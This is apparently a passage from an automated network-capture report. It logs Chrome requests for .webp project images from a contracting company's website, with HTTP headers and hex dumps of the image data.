                                              Data Ascii: Tj|k~5$"8=RCM-]1V\3~S'Agu*!FXafU_UK9NJTTemKFY$ULJjME6I{DGEsHiUY\c;cm""KUF$r"#v?Y--;%7Xrod{o0Ng56"}0PakP
                                              2024-09-27 06:20:17 UTC8000INData Raw: 98 a8 b0 42 da d1 23 b6 8a b3 d4 d6 94 cf bc da b2 da 8f 99 1a 85 df d4 52 1b 74 db 6c 34 d3 1d eb 63 a9 39 72 31 53 4e af 95 4e fe ac a3 54 76 a6 fc 7e bd d3 41 c5 8c 51 23 5e 51 44 41 05 f6 3e ab 8a ac 16 12 89 15 59 2b 0c 2a 12 f6 3b 89 12 57 57 02 7c c6 85 52 fe 7b 88 17 c8 38 c3 57 77 5f 71 23 ec 89 d1 84 41 bd 51 64 56 43 65 13 24 18 61 8c 62 a3 0f 18 eb 57 25 d6 8f f2 5b 33 97 cd d9 55 f9 bb 0b 3f 9b bb 97 cf dc 7f e4 37 4f e4 b6 f2 fe 5b 62 0b 3e 6e 09 0f e6 e8 45 8f 3b 06 97 31 74 96 ae 4b 72 73 ef 6c a9 66 fe dc 24 bc b6 dc 4f e6 f6 5d 39 dd a3 f9 ad d7 fe 6b 70 fe 77 6d 4f e7 76 99 39 cd 95 4f e7 76 08 f3 17 c9 51 77 2e 23 ab ec b5 ec 21 77 76 ea 69 d6 86 b5 6a a2 fd 23 62 55 28 ec dc 77 36 64 5b 0b e6 56 b6 56 aa aa 54 99 ac ea aa 29 35 6a ec
                                              Data Ascii: B#Rtl4c9r1SNNTv~AQ#^QDA>Y+*;WW|R{8Ww_q#AQdVCe$abW%[3U?7O[b>nE;1tKrslf$O]9kpwmOv9OvQw.#!wvij#bU(w6d[VVT)5j
                                              2024-09-27 06:20:17 UTC8000INData Raw: 29 0d 11 a0 e2 c7 14 d6 46 e3 f0 46 15 bf 5a 62 54 13 ce d7 bd 63 a2 09 cc f4 bc 0a f6 4f 4a f8 a8 92 54 24 a4 16 69 75 e9 49 40 59 25 2b 2e 4c ae 51 b1 be 55 02 a0 98 d8 d4 12 ca 7a c8 4b cb 62 d6 0a 34 d8 51 fb a9 8c 94 13 2f dd 0a 12 4d 4b 6a 1e c7 bd 39 4f 64 35 6e a3 63 a6 4c 26 a0 54 6c 9d 9b b4 60 5d 36 ae 9a ee 07 cb 74 e1 0e 16 60 42 35 34 d7 8b 32 b1 e5 ef 4c 5b b0 a3 5f 28 e5 25 62 99 54 e3 fb c9 eb 96 c4 c0 07 44 98 07 51 5e 05 7c 05 40 bd 36 35 da 19 ac 75 d8 9d 46 9d 7c cb ec 57 b2 61 2d 43 28 32 30 9a 71 05 04 1e c8 6a 58 a8 cf 5e de 4b a7 ee a3 43 c5 61 b9 3d 33 55 75 20 02 3e 2e d5 95 61 f9 94 66 b1 d5 c4 6c e5 8d de c5 4e d0 b3 c5 62 a7 86 d8 ac dc 36 3d 13 58 79 d7 a0 06 ce c5 ff 00 31 66 2c 10 7d bd 09 9d 35 91 b3 32 80 75 24 e9 db a1
                                              Data Ascii: )FFZbTcOJT$iuI@Y%+.LQUzKb4Q/MKj9Od5ncL&Tl`]6t`B542L[_(%bTDQ^|@65uF|Wa-C(20qjX^KCa=3Uu >.aflNb6=Xy1f,}52u$
                                              2024-09-27 06:20:17 UTC8000INData Raw: cb a4 66 48 19 e3 32 07 89 03 1b 46 38 43 1f d9 56 6f b0 1c 02 e9 24 61 b2 53 24 72 44 ac 76 d1 4c 8a a1 88 1d 9f f4 35 50 e9 fb d4 34 fa 76 7f 27 0a 3b 50 54 e9 56 6a 0d e4 e9 06 83 f9 36 8f a4 63 ce 9f db 5f e7 c7 e6 47 fd b5 fe 7c 54 7f 25 8d dc f7 17 fc db ab 48 6e 1d 23 96 25 8d 5a 54 0c 42 fc 02 da 46 33 f5 ef e3 7a c3 fc 94 5c 5d 4a b6 f3 eb 8a d6 e6 54 2d 7b 72 d4 78 e0 77 53 a7 5e 93 42 30 a7 d4 da b5 51 0f 1d ac 7b d4 1d 8a 06 09 a7 4f 6f 18 e5 1f 64 c3 08 5a 9a 8a 29 6d 3b 35 15 04 d3 6e 55 ff 00 c9 65 e9 af 6d 75 04 88 9c c8 a7 98 40 b6 d7 aa 00 67 f4 84 4e 65 93 40 6c f8 72 df 4f e5 2b a4 d0 00 75 70 d0 d6 b9 6d d5 95 30 1c 37 01 cc 13 55 cb fa f4 23 f9 19 ce 61 45 4f d3 4f d7 fc ad 71 aa 43 25 94 7d 2d e2 88 48 ea 92 b3 75 56 5a 3e 96 d0 f4
                                              Data Ascii: fH2F8CVo$aS$rDvL5P4v';PTVj6c_G|T%Hn#%ZTBF3z\]JT-{rxwS^B0Q{OodZ)m;5nUemu@gNe@lrO+upm07U#aEOOqC%}-HuVZ>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              99192.168.2.465436173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:17 UTC724OUTGET /uploads/projects/20/712fe2efb37a4a3b2be6e91c62276b19.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:17 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:17 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 11:43:59 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 59298
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:17 UTC7931INData Raw: 52 49 46 46 9a e7 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 26 e7 00 00 90 2d 04 9d 01 2a cf 04 a3 03 3e e9 70 b0 52 a9 26 a5 23 a6 37 e9 69 20 1d 09 67 6e d7 ce cd ba f7 ef 87 ed 90 94 45 fa f6 36 a0 25 90 57 c8 9d 6b 98 f6 5a fa 0b c1 4e 8e be 72 b3 e7 f2 ba 3a ea a7 65 fd ad 9b ef 1d 5d 48 71 d6 f0 0c e0 fe 6f bf d7 a6 ff f6 de 97 bd 24 bf b3 7a 33 f3 79 f5 03 fd d7 a6 93 d6 8b f9 df a9 3f ee 3f ae 2f ae 27 fb 7c 96 5f b2 f9 0d fa af f8 9d f6 fe af f9 df f9 3f d1 fb 75 dd ff e6 bf d7 fd bb f5 5f fb 87 f0 6d 03 7f a9 e0 3f f0 ff da 7a 08 fe f7 e5 9d 03 3e c2 50 37 ea 3f e4 bd 01 bf 4f f6 cf d6 3f e4 ff de fe cd 7c 02 fe df fa af ff b7 c6 c7 f2 ff f9 fd 85 bf ab ff bc f5 91 fb ff ff d1 ea af f7 6f fc ff bc bf 03
                                              Data Ascii: RIFFWEBPVP8XVP8 &-*>pR&#7i gnE6%WkZNr:e]Hqo$z3y??/'|_?u_m?z>P7?O?|o
                                              2024-09-27 06:20:17 UTC8000INData Raw: 23 c5 2b f5 91 2d b4 7a 93 f7 9a f3 d5 83 5f 41 78 63 78 ff f1 45 23 fe 1e d6 9c a1 a6 55 a2 dc 19 4e c8 c1 64 00 d9 3d 81 ec 93 d9 ca d7 cd 9f ba 61 82 b0 ea 44 ac e4 38 5d e7 c1 3f 30 19 d0 d7 5a 8f 95 c0 70 11 ab 23 88 1e 91 a7 e2 a5 60 52 7b 3b 27 ff 0e 43 a3 c8 e2 23 58 17 8f 42 35 a8 37 33 ad 10 ee 2b 05 e0 da 10 3f e0 9e 59 b5 ae 6e e0 02 9d 10 c9 01 e2 ab 82 00 18 30 ef ee 2f 7f 6f 6c 7d ef 89 05 f5 38 81 09 f4 2c 7f bb 31 0a a4 c5 52 59 3e a0 ab b1 0a 9d 0c 39 fc 01 56 76 c7 76 e0 d2 4f c8 e3 02 24 1b 4f 48 67 fa 91 f2 04 5e 1b 4f 13 77 20 e0 73 9d 5d bd ad 49 80 28 18 fb ab 2d 9c 72 e3 ad bd 21 0a 67 b0 13 39 bd 59 58 00 01 a3 7e 61 dc e4 3c 62 2a 44 c8 a8 bf 49 51 4d 83 ce fb 79 2d ce 65 ed 12 b6 da 19 ed 49 ce 6e fd 56 05 8c 4e 2e 9d 05 1f 31
                                              Data Ascii: #+-z_AxcxE#UNd=aD8]?0Zp#`R{;'C#XB573+?Yn0/ol}8,1RY>9VvvO$OHg^Ow s]I(-r!g9YX~a<b*DIQMy-eInVN.1
                                              2024-09-27 06:20:17 UTC8000INData Raw: 70 45 78 7c e0 d1 1c 23 d5 a6 78 e6 3b 0b 83 f0 ee 0f e9 1e aa 18 0e 07 82 4d fb 2c 4e e9 1c 61 e0 4c 2c 2a 19 90 53 6a 4b ea 83 2c 91 f1 25 6c d3 8e cd bc 06 2b dd 62 dc 6a 16 a7 58 1f 83 87 38 07 fb cc 8c 0e 60 d1 0f ae 0e b7 25 27 31 c9 25 bf 60 07 e4 4e b5 bb 4d 0d 6a 33 cb 6e ab a9 78 a2 c2 d8 bc d0 d9 f6 54 0c 88 0e 1e b6 f5 62 a1 38 db ec 0d d0 a3 53 77 c5 be fb 74 66 d6 9b ac 55 ca b2 ee 20 65 96 e0 24 d1 12 9f bf c8 49 12 6e c2 83 88 73 67 f6 9a 6c 1e af 9f 57 3e 8f a3 0d b3 70 51 c4 73 cf 72 ca 6f da c3 55 e8 3f 5f 8f d9 1d 12 55 95 c7 be 78 02 e5 66 bf d3 59 e3 5e 45 30 41 8e 67 ae f7 d2 40 32 17 f9 32 ab 87 55 9f bf e3 d7 90 6f 88 4d 2c 15 5d 0a 0d 7b 92 ec 24 c9 60 41 9b ad 12 bf 6e 5c ef 7a 8e 66 a2 65 ab 41 7b fa ef db 27 88 48 b4 5b 5b b0
                                              Data Ascii: pEx|#x;M,NaL,*SjK,%l+bjX8`%'1%`NMj3nxTb8SwtfU e$InsglW>pQsroU?_UxfY^E0Ag@22UoM,]{$`An\zfeA{'H[[
                                              2024-09-27 06:20:17 UTC8000INData Raw: 63 4d ee a3 73 ad ca dd c1 8d e5 d2 cc 85 33 02 b2 9c 35 d1 4a 37 e6 61 7a 83 f4 b4 4b 9e 19 74 27 b9 17 ca 6f 53 22 f8 85 e4 9c 99 ae af 64 b5 6f a4 2c 6b 4f d7 ac 15 d1 2e db a8 1d 88 a6 cb db 6f 0e 45 28 a6 1b 9b ae e4 0c d7 7f ee 8f 39 27 7b 06 6d 52 14 ce 4b c2 3a 55 d7 19 25 a7 9f c3 42 22 82 f6 b5 be 09 ef ba 7b 04 de cd a3 24 cb ae 6d c7 07 bb 91 94 b1 4c 3b a8 c1 fc e3 de dc 24 26 13 00 4c 33 d2 d7 ea b3 9b aa e7 01 6c 85 5b 8f 1c fa d7 ac 3d 2d 6e d3 03 84 fb dc 0e e0 d3 4c 56 0a 23 a7 ac b0 ef d1 69 c5 2a 86 fd 63 45 e0 bb 9a 4b 67 7e 9c b6 7e 33 14 1d d1 74 e7 09 ec da bd 26 5b 9d f5 8e 45 47 dc ed 0d af 04 09 8f a7 46 33 dc 47 f1 ce 9d b5 a2 d1 10 58 a8 68 1e 97 51 6a 6a 07 d5 a4 ba 50 38 32 4b 0b 1a f7 c6 bf 35 91 28 30 bd 55 ba 0d 74 c8 a6
                                              Data Ascii: cMs35J7azKt'oS"do,kO.oE(9'{mRK:U%B"{$mL;$&L3l[=-nLV#i*cEKg~~3t&[EGF3GXhQjjP82K5(0Ut
                                              2024-09-27 06:20:17 UTC8000INData Raw: 46 19 e6 c1 df 74 67 7b d3 c8 63 54 ce b2 1f 55 53 c9 58 3f b0 11 27 bc b5 ae 63 89 61 07 b2 b5 fc 88 c7 fb 0d 0f 3c 3a 80 c9 b2 60 0b d3 ff c9 a6 55 c1 f2 aa 2e c4 61 9b 54 7b cc 71 9c 5d 85 4d 22 92 4a c1 c9 7f b4 b5 df 1a cb f5 f8 7a b5 db 82 a5 77 1b 36 9f 8a 5c 44 d6 b3 64 a2 54 6e 74 35 32 10 65 d3 f1 ef 6a 68 66 dc e0 a7 21 25 11 4b a9 f0 d5 89 d1 7a f7 8b b9 d7 51 2a 35 3e 22 a2 fd 83 fa 22 05 54 fb e8 41 39 94 fe 79 02 b7 dd 5b 14 17 88 2f 7b ce 57 02 57 53 94 20 1f d4 4e 4e e0 91 5a 5b 3e 0c 3a 48 a4 ac 30 fa 58 0c 84 0d c3 90 94 97 35 b9 a1 ee 0f b3 4d 12 ad 8f 4c 1c 89 df 20 9c 5a 79 0c 1f 2c 15 2b a5 54 86 81 ba 09 4b 6d a7 e0 c6 d4 7f 02 b3 82 61 55 a1 c4 0f be 22 37 2a 5f 4f 57 c2 03 ad c5 6f 98 9c dd a7 b3 c4 eb 56 e7 85 8e 55 ea 76 4a 23
                                              Data Ascii: Ftg{cTUSX?'ca<:`U.aT{q]M"Jzw6\DdTnt52ejhf!%KzQ*5>""TA9y[/{WWS NNZ[>:H0X5ML Zy,+TKmaU"7*_OWoVUvJ#
                                              2024-09-27 06:20:17 UTC8000INData Raw: 8d b4 ce bb 4f 4f 5e f9 2e 4c ad 61 ea 0b f0 c2 4b 4e a6 59 9a 11 7a 41 26 05 b2 94 ff 61 06 9f 9f ae b5 d7 2f a5 78 79 a5 b3 7d e2 3c 72 6b b9 10 a8 90 62 fe cc 65 5d 2c 4c e9 fb 24 20 0c 51 1d 6a 18 75 8c 36 de df 57 e1 0f 5d 43 6b f7 56 db 95 f2 cb 4a 26 ab e0 df dd f6 7e 03 7d 81 f0 42 e5 b6 0a dd 2e 7b 5d c8 5e 95 1e a2 c3 8e 6f 85 99 b2 64 ba 76 ad 11 5f 2c 22 3c 47 66 67 43 c7 26 55 cb ae f0 56 af 90 a4 e2 a5 c0 66 73 0e d7 cb 89 b1 72 18 19 93 bc 95 f6 2e 2d 40 86 06 4e f7 e8 be fc 4b ea 56 cc 97 2d 38 91 ce 1b 3a 15 d6 00 de d1 ae c2 50 4c f2 47 66 c9 bc 65 b8 9f 2c 35 d4 76 5e 02 ff 22 5c 29 76 1f 1a eb 80 19 17 3e 96 ce 1f d8 7d 14 1e 69 02 cd 46 ad eb c0 6d 47 ac 20 51 b1 11 fb b2 76 6e 5a 0e 0c 15 e3 c5 ab e7 92 4f b1 6d 4e 17 c2 1c 8d 15 7f
                                              Data Ascii: OO^.LaKNYzA&a/xy}<rkbe],L$ Qju6W]CkVJ&~}B.{]^odv_,"<GfgC&UVfsr.-@NKV-8:PLGfe,5v^"\)v>}iFmG QvnZOmN
                                              2024-09-27 06:20:17 UTC8000INData Raw: 3c 67 a3 83 a9 f4 67 39 f7 cc 68 19 1b 79 d2 b0 a5 26 02 83 00 bc 0d 95 40 de e6 9d a1 3e 1b f1 ee 9b a9 0e be f9 b8 bb a1 1c 98 f9 f9 93 3c b6 42 03 f1 40 ed 72 b9 22 d2 0c 60 81 0d aa 71 8a 47 21 40 6b 0d 8b 46 92 0b 97 34 4e 51 e5 66 40 6f 87 22 06 b3 cb 33 b3 42 37 2c ce fb 9f 29 ef 2f 2c 1a f4 ec f4 fb 8b 48 e1 67 c1 eb f1 8a 0b 38 0d 37 22 0d 6e 77 b0 00 ef b0 9b 1b ee f3 3a 70 b0 ff a0 33 d7 ba 48 39 c1 56 fc 69 9d ed 44 d2 79 ed 39 70 b1 75 47 ae ff 7b 44 f2 7c 00 bd cb 63 fe 43 b5 ad 65 b5 28 1e b0 c2 fc d0 10 d9 d7 89 f7 00 57 f1 2d 3e 56 95 3c e0 b4 12 5f 54 59 5e 12 e1 59 ab 86 98 01 2f 2a 8c c6 a2 3b a0 7d eb eb 04 fc 5f 46 a3 f1 67 a2 e7 92 d9 be 5e dc c5 e2 fd d6 88 f0 79 91 5a 8d d8 de d2 3d 15 d8 58 f6 0e ad 51 e3 7a bc 81 95 df 1f fa 79
                                              Data Ascii: <gg9hy&@><B@r"`qG!@kF4NQf@o"3B7,)/,Hg87"nw:p3H9ViDy9puG{D|cCe(W->V<_TY^Y/*;}_Fg^yZ=XQzy
                                              2024-09-27 06:20:17 UTC3367INData Raw: 5f 9a c3 6e 4b 95 b0 42 a6 3d 0d 85 bc 48 b6 c5 6d 20 49 79 e5 66 19 97 2f fc 50 67 8d 43 b4 3c 1a ab 32 4f 53 8c a7 b9 a9 75 3f 0a 27 a6 ca 51 f1 d1 f6 73 68 c5 e5 0e 91 5e 39 88 bc ea 64 8a ee f9 c8 9d 03 59 4b 11 95 b4 f6 ae 9b dc 41 3f 70 5b 65 fe 35 ef 6e be 6d 96 08 f8 1f 1d a3 1b 2d 0a b5 0a e1 f0 90 14 c7 ef 7d ce d4 ac 7c 09 22 6b fc 14 cf e8 83 93 08 7e 49 6c 15 62 e5 9b 75 72 52 09 1d a6 53 7c 62 0e c6 b0 80 e6 e4 06 da 54 e8 b9 8e 8b df a1 14 2c 20 e1 2a cf a2 42 47 07 eb ad 95 d3 36 f0 fc 73 bb e4 03 ff 9b f5 d2 0a 30 9f 9d 40 7c 68 13 55 80 bb db a9 96 b7 b2 19 3a e2 81 70 dc a0 00 3e df 5a 91 6d 6a d5 03 c4 4b 78 5d 70 74 d6 4a 66 76 bf 85 c6 5e 84 ea a0 2f 3f 78 70 1c e4 45 86 52 c9 33 f6 94 27 e0 20 d8 28 15 53 a0 66 e6 d3 25 5e 97 ea 19
                                              Data Ascii: _nKB=Hm Iyf/PgC<2OSu?'Qsh^9dYKA?p[e5nm-}|"k~IlburRS|bT, *BG6s0@|hU:p>ZmjKx]ptJfv^/?xpER3' (Sf%^


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              100192.168.2.465433173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:17 UTC464OUTGET /uploads/projects/7/21d631acc2ddb0fc3dcf4f737c53f9da.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:17 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:17 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Mon, 09 Jan 2023 14:14:19 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 60650
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:17 UTC7931INData Raw: 52 49 46 46 e2 ec 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 6e ec 00 00 30 32 06 9d 01 2a cf 04 a3 03 3e e9 6a ae 52 a9 25 b3 33 a4 92 ab 82 70 1d 09 65 6e 0a c3 b9 61 f0 ba af 26 6e 75 3b f1 2a fd 59 e7 cc 2a 68 d5 5f 83 57 ea 1e a9 26 e7 62 be f7 c4 b3 d2 3f d2 f4 da e4 43 f0 7f f5 bd 83 ff 66 bd 54 73 b3 fe cb 9f 2f a4 1c fb bc db 87 9a 79 df 8f 22 e2 03 b6 ff 51 ec da fc 4b 34 7f 8c ef bd ff 8f d6 a7 f8 2f 51 1f f0 dd 1e 3f b6 7f e0 f5 5b fd 4b fe 3f ad 1f a5 af f6 de 9d 9e 97 bf fc 7f ff ff ff f8 64 fe bd ff a3 ff ff b9 1f 9d 6f ff 5f 69 4f f3 7e ab ff e4 7d 00 3f ff fb 71 74 23 f9 c7 fe ef 3b df 48 ff 4f ff af fc af 2f ff 45 fd 67 fe 5f ed fd d8 ff d2 d0 df dd ff e3 e3 fb fb 36 73 3f e6 fd d6 f3 87 f6 3f 06
                                              Data Ascii: RIFFWEBPVP8XVP8 n02*>jR%3pena&nu;*Y*h_W&b?CfTs/y"QK4/Q?[K?do_iO~}?qt#;HO/Eg_6s??
                                              2024-09-27 06:20:17 UTC8000INData Raw: c1 71 bb 97 0c 68 3b ca 40 b8 9e 43 ae c1 52 e4 60 47 ef 58 46 0e 7d bb 1a 90 36 c1 a5 c5 91 d5 77 a8 f0 48 49 d1 b1 71 22 21 70 e0 25 5f d7 0a f9 e4 66 a6 91 11 e2 da 65 23 4c d4 83 e6 f5 84 3f b0 1c 4e 74 3e dd e4 16 40 e4 38 ee 18 76 1d dc 8e 8b 81 50 52 ac 8d 26 6f 27 cf 1c 2c b8 09 e3 88 5d 97 c4 71 32 cc a4 b0 49 b4 9b 82 88 b0 bb 6b 1c 0d 76 9a b0 e6 84 a1 bf 7d e9 f4 4a 16 8b 89 71 f8 f9 fd 3a 83 9f 18 9a 9e 2a 78 88 c8 9d b2 5a a8 86 b4 76 24 a2 ac 26 cb 35 5e c2 43 13 2e 5e 58 3f d8 2c 69 5b 92 85 18 ce 18 24 d7 bd 09 36 ae ee 91 66 8e 0d 31 7d fc ed c0 33 30 84 37 a7 09 13 f5 c0 c3 8a 5a 07 87 04 b2 f6 9c a1 09 bd 71 a1 45 61 eb 6d eb 31 3d 49 e3 33 50 ac 24 0a 08 95 1f f3 3c e7 d1 65 f8 55 02 e7 03 9f 26 7e f1 0f 46 04 4f 8a d6 85 17 0d 34 78
                                              Data Ascii: qh;@CR`GXF}6wHIq"!p%_fe#L?Nt>@8vPR&o',]q2Ikv}Jq:*xZv$&5^C.^X?,i[$6f1}307ZqEam1=I3P$<eU&~FO4x
                                              2024-09-27 06:20:17 UTC8000INData Raw: 04 36 da 10 e3 f7 08 d3 4f 49 e1 57 e4 3c 84 36 e2 50 70 4a 55 3f 65 7b 6c 75 3a 51 93 24 77 30 88 ac c7 83 aa 0c e0 e0 46 4b cf ef 0c 89 a5 01 26 6d c2 43 69 1d 31 1c ff 3a f1 4a f9 83 9d da 93 64 16 bd 79 8f 6e fd 24 36 60 5e b5 39 c9 80 5b 50 f7 93 ae c8 84 d3 f9 93 27 1b 25 01 ce 3c 09 50 68 f9 dc d2 21 c0 c4 90 de 18 36 a4 db 8c e6 76 ee 45 26 e7 88 10 d2 b4 48 e8 5e 01 10 cd 93 5d 17 f3 d8 b1 71 8a 6c 5b 17 bc 1b 46 cf c0 91 16 1b 5d d2 89 68 8f 54 3e e0 30 50 de e9 88 5f dc 0d bb 90 81 7f 53 27 d1 bb c0 1c 9f 71 2b 6f d1 54 9a 60 91 e1 c3 64 6b 2e c5 d3 f5 0d a1 e0 d7 1d a9 13 95 69 00 01 39 1b 26 1e 62 12 e6 a6 3a b6 46 05 a2 0a 99 2e bb 0b 8d dd be d3 6f ac 05 49 03 ac d6 06 94 f1 42 44 8f 2d 0e 28 92 16 b5 fc d6 89 0d 12 fb 09 3a d7 bf 34 90 7a
                                              Data Ascii: 6OIW<6PpJU?e{lu:Q$w0FK&mCi1:Jdyn$6`^9[P'%<Ph!6vE&H^]ql[F]hT>0P_S'q+oT`dk.i9&b:F.oIBD-(:4z
                                              2024-09-27 06:20:17 UTC8000INData Raw: c8 de 15 50 53 78 16 6a 11 66 71 52 e6 9e 02 b3 e5 f0 53 2e 3c c6 2e c7 2a f1 36 17 6c 1a 85 f5 b2 d2 c3 d4 87 9c 21 74 81 ac f5 7d 7d bd 50 59 a2 7e 4c a0 70 50 8a 8a 6d 0c f9 f6 22 4f e3 86 b2 78 6b 55 15 0c 02 e7 24 8a 3d 71 82 22 67 59 3b e8 3b b6 4a 4a b1 ff fc 83 1c 15 b0 4c c2 8c 68 6f 97 c2 22 3b c3 1d dc f2 97 60 32 64 63 16 20 4a ad 85 59 af 28 4e 5d 1b 19 4a 5a f3 14 ca 0b 4f 9b 5b 0d c7 38 4c e4 9c 06 1b 6d d3 d0 28 b1 5d 7d 8f f6 22 bf 8b fe bc 05 10 0c 53 b0 6d aa 04 27 0a 36 4b 03 16 4b 6d 55 43 5c 30 a2 a3 e3 fc 26 28 97 49 82 20 18 9b b5 b5 f0 78 9e 76 88 dd 87 82 59 e5 a3 df b3 16 6f fc a7 fa 3a 3d 9d 86 85 15 9e 26 5e a8 41 20 62 35 71 a5 8f 2a 56 32 ca 14 ef ca ca b1 0f c0 66 d1 08 41 d4 6e 6d 05 b2 5b 61 c2 6b d4 9b 66 3a 4b d8 3f 16
                                              Data Ascii: PSxjfqRS.<.*6l!t}}PY~LpPm"OxkU$=q"gY;;JJLho";`2dc JY(N]JZO[8Lm(]}"Sm'6KKmUC\0&(I xvYo:=&^A b5q*V2fAnm[akf:K?
                                              2024-09-27 06:20:17 UTC8000INData Raw: 4c 80 42 4f a0 82 10 6d cd 6e d2 1b ee b8 80 bd 67 e4 6a 41 d4 64 80 1a 16 7e de e1 6b e8 cb b3 b7 af 42 03 11 c3 38 6a 71 8d 70 a4 19 c1 95 62 13 0a a7 21 cf 4d 50 31 96 0f d9 19 0a c5 2a 8d 62 a7 fb 54 0c 0f 82 93 33 91 4e 85 37 eb 49 36 42 bf 10 76 9f b3 d7 e6 01 16 ea be 89 12 a0 e0 8d d6 71 e0 d0 dc 3d 3e 99 d5 b7 25 7d 4d 5e 04 ad 07 e1 57 5d 36 74 06 ae e8 3a 0c b3 05 16 bb ee 3a 69 93 8a b5 0d b9 c5 ac a2 8d 73 8a 36 2b 8c d7 2a 4c 5a 34 57 ff 04 73 bf 01 b8 ea 11 71 bf f0 aa 7d d7 09 a1 cb 05 af 60 52 71 99 22 d3 ef ff 28 8c dc e7 67 11 f1 c5 af e6 50 c3 25 06 81 14 18 f7 33 0c 13 a6 4e 0d 24 24 7c 5e b0 f0 26 67 2d c8 07 c9 76 be 0b 57 5f d9 ec 70 58 14 50 17 8a eb 69 75 78 b7 c4 d7 6e 38 f3 b2 80 b0 51 78 b5 5a a4 4d 59 87 8f d9 e4 2c f2 ff bb
                                              Data Ascii: LBOmngjAd~kB8jqpb!MP1*bT3N7I6Bvq=>%}M^W]6t::is6+*LZ4Wsq}`Rq"(gP%3N$$|^&g-vW_pXPiuxn8QxZMY,
                                              2024-09-27 06:20:17 UTC8000INData Raw: 5d e5 c4 43 ee 67 50 2b 48 9d f9 1c 51 77 9e 56 e3 00 a8 0a ca 62 e5 90 ed 68 bd 91 51 76 9e 6a 4f 7f bf 1c 9d f1 cb eb 0f 5e 68 db de 28 74 60 c7 24 a0 e3 ce 82 82 68 9d 5e 86 43 45 67 6d da 3d d3 08 83 d8 87 ea a1 0d c5 7f 7e fc 38 36 a7 0f b0 81 62 d9 1b 30 36 de b7 04 93 89 97 ca b3 4c 7c 66 8e 29 8b 01 be 75 7f 7d f7 67 c0 2f 10 29 77 4e e5 b4 82 62 ba 1c 2d a2 8d df 5b 1c dc 96 e7 99 cb ee 1e 8f fe 89 4c 56 3b e6 8f 65 8e 74 07 a1 67 bc 46 a1 91 ce af 0e cc d3 40 56 1f 19 1f 53 2a e5 91 16 94 6f 62 c2 8a b6 57 4c 5f 28 25 24 37 1f 00 66 6f fb f9 60 06 b1 fa f8 37 e2 88 87 ad eb 05 12 75 f7 85 67 c2 48 e5 e6 69 f8 2a 36 77 0b 11 66 8a fc 1d e6 34 5c 5b 1c 3e 8c 8a b1 e1 16 f2 39 0f 58 e1 aa a8 6d ab 22 0e d0 d9 c6 c0 cc cc 02 36 1b d4 e4 2c 89 e5 a9
                                              Data Ascii: ]CgP+HQwVbhQvjO^h(t`$h^CEgm=~86b06L|f)u}g/)wNb-[LV;etgF@VS*obWL_(%$7fo`7ugHi*6wf4\[>9Xm"6,
                                              2024-09-27 06:20:17 UTC8000INData Raw: bf 48 14 06 cf 56 f1 d9 13 d4 a6 53 c1 fe a7 c4 fa 34 f3 fd 20 32 de 43 57 43 b2 13 f9 55 1c 4f e9 0e 3a 16 5a ce 1d e7 a7 f7 5c ab 0d 85 66 04 b0 d7 f6 fd 14 b1 79 b8 ee 4c 7d d3 2c 3d 59 4a d1 43 b4 42 b6 a2 37 bc 21 69 8b 11 ed 25 b0 b1 46 4f af af a1 61 39 b1 cc 0d 09 b6 a6 31 f1 17 c1 65 9a 59 12 98 88 88 9d ec a1 8a 2c 89 e6 7a 0a 72 63 f2 6a 00 70 d3 b7 38 6e 55 44 fd da a6 10 8a c8 f6 b4 8e 6f d7 29 d5 7c a2 7a 89 58 1d 55 01 a0 ac ca 5f f3 9b 4d cc 27 0f 43 5e af 79 5a 68 24 e1 c3 17 bc 9b 73 d9 3b e9 7b 6a 16 27 db fe aa bd d4 e8 a5 3b fe 03 d3 95 80 69 5f 26 b2 ba 54 48 08 5b 74 da da ce 0c c6 6c a6 52 ed 13 98 f2 40 ce 51 84 c5 89 38 30 12 fb c1 a0 97 21 93 f6 e3 71 85 bf 20 c7 a9 c1 17 cd 11 c2 7a 51 dd 15 12 57 5c 56 4f 72 33 27 b2 02 e9 a3
